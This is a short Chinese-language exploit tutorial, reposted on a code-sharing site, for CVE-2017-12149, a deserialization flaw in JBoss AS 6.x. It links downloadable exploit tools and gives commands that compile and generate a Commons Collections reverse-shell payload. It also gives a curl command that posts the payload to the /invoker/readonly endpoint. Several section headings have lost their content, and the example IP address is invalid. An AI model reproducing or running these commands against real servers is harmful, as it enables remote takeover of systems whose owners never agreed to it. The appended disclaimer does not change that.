CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用


檢測目錄: 

返回500 一般就是存在了。

下載工具:

http://scan.javasec.cn/java/JavaDeserH2HC.zip

使用方法:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

 

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反彈shell的IP和端口

這個時候會生成一個ReverseShellCommonsCollectionsHashMap.ser文件,curl 這個二進制文件就可以了。

ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser

curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

監聽:

發送payload:

服務器log:

反彈結果:

工具:

下載地址:http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip   (使用本工具僅供安全從業人人員測試驗證、使用請遵守中華人民共和國網絡安全法)

 

done.

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM